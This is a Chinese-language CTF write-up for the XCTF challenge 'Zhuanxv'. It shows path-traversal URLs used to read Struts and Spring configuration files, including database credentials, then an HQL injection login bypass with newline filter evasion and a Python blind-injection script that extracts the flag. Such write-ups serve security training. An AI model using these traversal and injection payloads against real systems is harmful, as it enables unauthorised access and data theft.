【XCTF】Zhuanxv

收获

  • java题的一般流程

  • HQL注入

  • SQL注入

看题

  • 目录扫描

    dirsearch扫目录,发现list目录:

    一个登录界面,本着尽量不写sql注入题目的原则(因为太菜了这方面,抓包查看代码:

    js代码中为了加载图片直接写出了后台存储图像路径,那试试能不能通过这个url和参数直接读取源码。

  • 读源码

    先查看web.xml文件:

    http://61.147.171.105:54826/loadimage?fileName=../../WEB-INF/web.xml

    直接得到bg.jpg文件,更改其后缀为xml:

    <?xml version="1.0" encoding="UTF-8"?>
    
<web-app id="WebApp_9" version="2.4"
    
         xmlns="http://java.sun.com/xml/ns/j2ee"
    
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    
         xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd">
    
    <display-name>Struts Blank</display-name>
    
    <filter>
    
        <filter-name>struts2</filter-name>
    
        <filter-class>org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter</filter-class>
    
    </filter>
    
    <filter-mapping>
    
        <filter-name>struts2</filter-name>
    
        <url-pattern>/*</url-pattern>
    
    </filter-mapping>
    
    <welcome-file-list>
    
        <welcome-file>/ctfpage/index.jsp</welcome-file>
    
    </welcome-file-list>
    
    <error-page>
    
        <error-code>404</error-code>
    
        <location>/ctfpage/404.html</location>
    
    </error-page>
    
</web-app>

    这里可以看到是一个struts2框架,于是我们找一下strust.xml:

    http://61.147.171.105:54826/loadimage?fileName=../../WEB-INF/classes/strust.xml

    得到:

    <?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE struts PUBLIC
    
        "-//Apache Software Foundation//DTD Struts Configuration 2.3//EN"
    
        "http://struts.apache.org/dtds/struts-2.3.dtd">
    
<struts>
    
	<constant name="strutsenableDynamicMethodInvocation" value="false"/>
    
    <constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />
    
    <constant name="struts.action.extension" value=","/>
    
    <package name="front" namespace="/" extends="struts-default">
    
        <global-exception-mappings>
    
            <exception-mapping exception="java.lang.Exception" result="error"/>
    
        </global-exception-mappings>
    
        <action name="zhuanxvlogin" class="com.cuitctf.action.UserLoginAction" method="execute">
    
            <result name="error">/ctfpage/login.jsp</result>
    
            <result name="success">/ctfpage/welcome.jsp</result>
    
        </action>
    
        <action name="loadimage" class="com.cuitctf.action.DownloadAction">
    
            <result name="success" type="stream">
    
                <param name="contentType">image/jpeg</param>
    
                <param name="contentDisposition">attachment;filename="bg.jpg"</param>
    
                <param name="inputName">downloadFile</param>
    
            </result>
    
            <result name="suffix_error">/ctfpage/welcome.jsp</result>
    
        </action>
    
    </package>
    
    <package name="back" namespace="/" extends="struts-default">
    
        <interceptors>
    
            <interceptor name="oa" class="com.cuitctf.util.UserOAuth"/>
    
            <interceptor-stack name="userAuth">
    
                <interceptor-ref name="defaultStack" />
    
                <interceptor-ref name="oa" />
    
            </interceptor-stack>

        </interceptors>
    
        <action name="list" class="com.cuitctf.action.AdminAction" method="execute">
    
            <interceptor-ref name="userAuth">
    
                <param name="excludeMethods">
    
                    execute
    
                </param>
    
            </interceptor-ref>
    
            <result name="login_error">/ctfpage/login.jsp</result>
    
            <result name="list_error">/ctfpage/welcome.jsp</result>
    
            <result name="success">/ctfpage/welcome.jsp</result>
    
        </action>
    
    </package>
    
</struts>

    为了登录,先查看com.cuitctf.action.UserLoginAction,其中因为.java文件在被编译后会成为.class文件,所以payload:

    http://61.147.171.105:57101/loadimage?fileName=../../WEB-INF/classes/com/cuitctf/action/UserLoginAction.class

    看完之后发现也没有什么线索,这里引用了com.cuitctf.util.InitApplicationContext继续看一下:

    http://61.147.171.105:57101/loadimage?fileName=../../WEB-INF/classes/com/cuitctf/util/InitApplicationContext.class

    反编译成Java文件后发现引用了applicationContext.xml,继续查看:

    http://61.147.171.105:57101/loadimage?fileName=../../WEB-INF/classes/applicationContext.xml

    源码:

    <?xml version="1.0" encoding="UTF-8"?>
    
<beans xmlns="http://www.springframework.org/schema/beans"
    
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    
       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    
    <bean id="dataSource" class="org.springframework.jdbc.datasource.DriverManagerDataSource">
    
        <property name="driverClassName">
    
            <value>com.mysql.jdbc.Driver</value>
    
        </property>
    
        <property name="url">
    
            <value>jdbc:mysql://localhost:3306/sctf</value>
    
        </property>
    
        <property name="username" value="root"/>
    
        <property name="password" value="root" />
    
    </bean>
    
    <bean id="sessionFactory" class="org.springframework.orm.hibernate3.LocalSessionFactoryBean">
    
        <property name="dataSource">
    
            <ref bean="dataSource"/>
    
        </property>
    
        <property name="mappingLocations">
    
            <value>user.hbm.xml</value>
    
        </property>
    
        <property name="hibernateProperties">
    
            <props>
    
                <prop key="hibernate.dialect">org.hibernate.dialect.MySQLDialect</prop>
    
                <prop key="hibernate.show_sql">true</prop>
    
            </props>
    
        </property>
    
    </bean>
    
    <bean id="hibernateTemplate"class="org.springframework.orm.hibernate3.HibernateTemplate">
    
        <property name="sessionFactory">
    
            <ref bean="sessionFactory"/>
    
        </property>
    
    </bean>
    
    <bean id="transactionManager" class="org.springframework.orm.hibernate3.HibernateTransactionManager">
    
        <property name="sessionFactory">
    
            <ref bean="sessionFactory"/>
    
        </property>
    
    </bean>
    
    <bean id="service" class="org.springframework.transaction.interceptor.TransactionProxyFactoryBean" abstract="true">
    
        <property name="transactionManager">
    
            <ref bean="transactionManager"/>
    
        </property>
    
        <property name="transactionAttributes">
    
            <props>
    
                <prop key="add">PROPAGATION_REQUIRED</prop>
    
                <prop key="find*">PROPAGATION_REQUIRED,readOnly</prop>
    
            </props>
    
        </property>
    
    </bean>
    
    <bean id="userDAO" class="com.cuitctf.dao.impl.UserDaoImpl">
    
        <property name="hibernateTemplate">
    
            <ref bean="hibernateTemplate"/>
    
        </property>
    
    </bean>
    
    <bean id="userService" class="com.cuitctf.service.impl.UserServiceImpl">
    
        <property name="userDao">
    
            <ref bean="userDAO"/>
    
        </property>
    
    </bean>
    
</beans>

    可以看到,这里是连接数据库的关键代码。看一下这些class文件:

    http://61.147.171.105:57101/loadimage?fileName=../../WEB-INF/user.hbm.xml

    user.hbm.xml源码:

    <?xml version="1.0"?>
    
<!DOCTYPE hibernate-mapping PUBLIC
    
        "-//Hibernate/Hibernate Mapping DTD 3.0//EN"
    
        "http://hibernate.sourceforge.net/hibernate-mapping-3.0.dtd">
    
<hibernate-mapping package="com.cuitctf.po">
    
    <class name="User" table="hlj_members">
    
        <id name="id" column="user_id">
    
            <generator class="identity"/>
    
        </id>
    
        <property name="name"/>
    
        <property name="password"/>
    
    </class>
    
    <class name="Flag" table="bc3fa8be0db46a3610db3ca0ec794c0b">
    
        <id name="flag" column="welcometoourctf">
    
            <generator class="identity"/>
    
        </id>
    
        <property name="flag"/>
    
    </class>
    
</hibernate-mapping>

    UserDaoImpl.class:

    package com.cuitctf.dao.impl;

import com.cuitctf.dao.UserDao;
    
import com.cuitctf.po.User;
    
import java.util.List;
    
import org.springframework.orm.hibernate3.support.HibernateDaoSupport;

public class UserDaoImpl extends HibernateDaoSupport implements UserDao {
    
    public UserDaoImpl() {
    
    }

    public List<User> findUserByName(String name) {
    
        return this.getHibernateTemplate().find("from User where name ='" + name + "'");
    
    }

    public List<User> loginCheck(String name, String password) {
    
        return this.getHibernateTemplate().find("from User where name ='" + name + "' and password = '" + password + "'");
    
    }
    
}

  • 利用

    看了一眼wp,这里是一个HQL注入,其实和SQL注入类似,payload:

    from User where name ='admin' or '1'>'0' or name like 'admin' and password = '" + password + "'

    这里使用'1'>'0'的逻辑绕过万能密码。因为代码中过滤了空格和等号,所以需要用ascii码绕过,并且使用换行代替被过滤的空格。

    admin'%0Aor%0A'1'>'0'%0Aor%0Aname%0Alike%0A'admin

    登录时,password随便设,同时这里需要使用Get方法提交,直接在网页上输入是POST方法,网页没反应。

    虽然登录成功,但是没有FLAG,所以需要根据user.hbm.xml的提示信息进行sql注入。

  • 注入

    贴上大佬的盲注脚本:

    import requests

s = requests.session()

flag = ''
    
for i in range(1, 50):
    
    p = ''
    
    for j in range(1, 255):
    
        # (select ascii(substr(id, "+str(i)+", 1)) from Flag where id < 2) < '
    
        payload = "(select%0Aascii(substr(id," + str(i) + ",1))%0Afrom%0AFlag%0Awhere%0Aid<2)<'" + str(j) + "'"
    
        # print payload
    
        url = "http://61.147.171.105:63105/zhuanxvlogin?user.name=admin'%0Aor%0A" + payload + "%0Aor%0Aname%0Alike%0A'admin&user.password=1"
    
        r1 = s.get(url)
    
        if len(r1.text) > 20000 and p != '':
    
            flag += p
    
            print(i, flag)
    
            break
    
        p = chr(j)

参考文章

javaweb项目的文件结构

总结

跟着大佬博客开始学习到java安全相关的东西了。跟同龄大佬的差距真大....真是太低手了

一道入门的java安全题的更多相关文章

  1. 今天考试的JAVA编程题

    今天早上考了java, 题目感觉还不错, 共四道题,有一道定义类的没啥意思就没列出来. 这三道题目还是不错的,特别是第一道,大一上学期学linux的时候,那时还没学C语言呢,准确的来说,还不知道什么是 ...

  2. 一道很经典的 BFS 题

    一道很经典的 BFS 题 想认真的写篇题解. 题目来自:https://www.luogu.org/problemnew/show/P1126 题目描述 机器人移动学会(RMI)现在正尝试用机器人搬运 ...

  3. 牛客网Java刷题知识点之HashMap的实现原理、HashMap的存储结构、HashMap在JDK1.6、JDK1.7、JDK1.8之间的差异以及带来的性能影响

    不多说,直接上干货! 福利 => 每天都推送 欢迎大家,关注微信扫码并加入我的4个微信公众号:   大数据躺过的坑      Java从入门到架构师      人工智能躺过的坑          ...

  4. 牛客网Java刷题知识点之UDP协议是否支持HTTP和HTTPS协议?为什么?TCP协议支持吗?

    不多说,直接上干货! 福利 => 每天都推送 欢迎大家,关注微信扫码并加入我的4个微信公众号:   大数据躺过的坑      Java从入门到架构师      人工智能躺过的坑          ...

  5. 牛客网Java刷题知识点之TCP、UDP、TCP和UDP的区别、socket、TCP编程的客户端一般步骤、TCP编程的服务器端一般步骤、UDP编程的客户端一般步骤、UDP编程的服务器端一般步骤

    福利 => 每天都推送 欢迎大家,关注微信扫码并加入我的4个微信公众号:   大数据躺过的坑      Java从入门到架构师      人工智能躺过的坑         Java全栈大联盟   ...

  6. ACM_一道耗时间的水题

    一道耗时间的水题 Time Limit: 2000/1000ms (Java/Others) Problem Description: Do you know how to read the phon ...

  7. Thrift入门及Java实例演示<转载备用>

    Thrift入门及Java实例演示 作者: Michael 日期: 年 月 日 •概述 •下载配置 •基本概念 .数据类型 .服务端编码基本步骤 .客户端编码基本步骤 .数据传输协议 •实例演示(ja ...

  8. 学Android开发,入门语言java知识点

    学Android开发,入门语言java知识点 Android是一种以Linux为基础的开源码操作系统,主要使用于便携设备,而linux是用c语言和少量汇编语言写成的,如果你想研究Android,就去学 ...

  9. 50道经典的JAVA编程题(汇总)

    这是一次不可思议的编程历程.从2013年的最后一天开始做这份题,中间连续好几天的考试,包括java考试(今天考试的JAVA编程题),直到今天完成了.挺有成就感的...废话不多说了,来电实质性的吧. 全 ...

  10. 50道经典的JAVA编程题(46-50)

    50道经典的JAVA编程题(46-50),最后五道题了,这是一个美妙的过程,编程真的能让我忘掉一切投入其中,感觉很棒.今天下午考完微机原理了,大三上学期就这样度过了,这学期算是解放了,可是感觉我还是没 ...

随机推荐

  1. Mybatis框架的搭建和基本使用

    本文总结最原始Mybatis框架的搭建和最基本使用(不涉及Spring框架体系). 1 依赖 首先,我们要引入Mybatis依赖: <dependency> <groupId> ...

  2. 原生CSS嵌套简介

    嵌套是使用Sass等CSS预处理器的核心原因之一.现在,该功能已经以类似的语法出现在标准浏览器CSS中.你能否在构建系统时放弃对预处理器的依赖? CSS嵌套可以节省输入时间,并使语法更易于阅读和维护. ...

  3. 每日一库:gosec

    gosec 是一个用于在 Go 代码中查找安全问题的开源工具,它可以帮助发现可能的漏洞和潜在的安全风险.以下是关于 gosec 的详细介绍: 1. 工具概述: gosec 是一个静态分析工具,用于扫描 ...

  4. 2.4 PE结构:节表详细解析

    节表(Section Table)是Windows PE/COFF格式的可执行文件中一个非常重要的数据结构,它记录了各个代码段.数据段.资源段.重定向表等在文件中的位置和大小信息,是操作系统加载文件时 ...

  5. GIS中的ROI文件可否由.xml格式转为.roi格式?

      本文介绍在ENVI软件中,将用户自行绘制的.xml格式的感兴趣区(ROI)文件转换为.roi格式的方法.   对于ENVI软件,其在早期版本中,默认将用户所绘制的感兴趣区文件保存为.roi格式:而 ...

  6. heygen模型接口 简单使用 java版

    HeyGen - AI Spokesperson Video Creator  官网地址 Create a video (heygen.com) api地址 简介: 公司最近对ai方面业务比较感兴趣了 ...

  7. Redis面试——Redis面试精华知识

    从:Redis 使用场景与介绍 -> 数据结构与简单使用 -> 小功能大用处 -> 持久化.主从同步与缓存设计 -> 知识拓展 ,并且分析典型场景下常见的问题,并结合实战演练, ...

  8. Go 语言开发环境搭建

    Go 语言开发环境搭建 目录 Go 语言开发环境搭建 一. GO 环境安装 1.1 下载 1.2 Go 版本的选择 1.3 安装 1.3.1 Windows安装 1.3.2 Linux下安装 1.3. ...

  9. The method dismissDialog(int) from the type Activity is deprecated

    The method showDialog(int) from the type Activity is deprecated in android?   up vote6down votefavor ...

  10. 触发器引起的ADG备库同步错误

    数据库alert日志报错ORA-16000,查看对应的trc文件,大致如下报错: *** 2020-10-27 14:09:03.340*** SESSION ID:(3340.75) 2020-10 ...